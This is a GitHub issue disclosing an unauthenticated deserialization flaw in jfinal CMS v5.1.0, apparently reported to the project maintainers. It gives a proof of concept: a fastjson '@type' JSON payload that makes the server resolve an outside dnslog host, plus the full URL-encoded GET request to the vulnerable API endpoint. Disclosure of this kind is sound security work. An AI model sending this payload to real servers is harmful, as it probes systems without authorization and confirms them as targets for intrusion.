Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

jfinal CMS v5.1.0 has an unauthorization command execution vulnerability #60

Open
kaoniniang2 opened this issue Nov 7, 2024 · 1 comment
Open

jfinal CMS v5.1.0 has an unauthorization command execution vulnerability #60

kaoniniang2 opened this issue Nov 7, 2024 · 1 comment

Comments

@kaoniniang2
Copy link

jfinal_cms version:5.1.0
JDK version : jdk-8u351

Vulnerability file ApiForm.java
image

The p parameter is passed in from the outside through the interface, and the parameters can be controlled, resulting in serialization.

POC:
p parameter content, URL encoding is required{"zeo":{"@type":"java.net.Inet4Address","val":"aporo8.dnslog.cn"}}

GET /api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1&method=pageArticleSite&time=20170314160401&p=%7b%22%7a%65%6f%22%3a%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%61%70%6f%72%6f%38%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%7d
image
image
@ElevenKong
Copy link

ElevenKong commented Nov 7, 2024 via email

@kaoniniang2 kaoniniang2 changed the title jfinal CMS v5.1.0 has an authorization command execution vulnerability jfinal CMS v5.1.0 has an unauthorization command execution vulnerability Nov 7, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@ElevenKong @kaoniniang2